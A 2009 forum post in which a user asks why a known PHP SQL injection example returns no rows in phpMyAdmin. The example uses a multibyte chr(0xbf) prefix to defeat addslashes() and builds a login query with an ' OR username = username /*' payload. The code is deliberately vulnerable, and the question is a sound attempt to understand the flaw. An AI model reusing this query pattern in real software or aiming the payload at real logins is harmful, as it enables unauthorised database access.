How is this code not secure ?
Posted: Wed Jul 01, 2009 4:30 am
i visited chris'web and i saw his code
i've tried to test that code and echo sql variable , it print that
i copied this sql command to run in phpmyadmin but it return result is 0 row, that is attacker cannot access my database
question is why did my database return result 0 row when i ran this code ? or can you describe this code
thanks in advance
Code: Select all
<?php
$mysql = array();
/* SQL Injection Example */
$_POST['username'] = chr(0xbf) .
chr(0x27) .
' OR username = username /*';
$_POST['password'] = 'guess';
$mysql['username'] = addslashes($_POST['username']);
$mysql['password'] = addslashes($_POST['password']);
$sql = "SELECT *
FROM users
WHERE username = '{$mysql['username']}'
AND password = '{$mysql['password']}'";
echo $sql ;
?>
Code: Select all
SELECT * FROM users WHERE username = '¿\' OR username = username /*' AND password = 'guess'i copied this sql command to run in phpmyadmin but it return result is 0 row, that is attacker cannot access my database
question is why did my database return result 0 row when i ran this code ? or can you describe this code
thanks in advance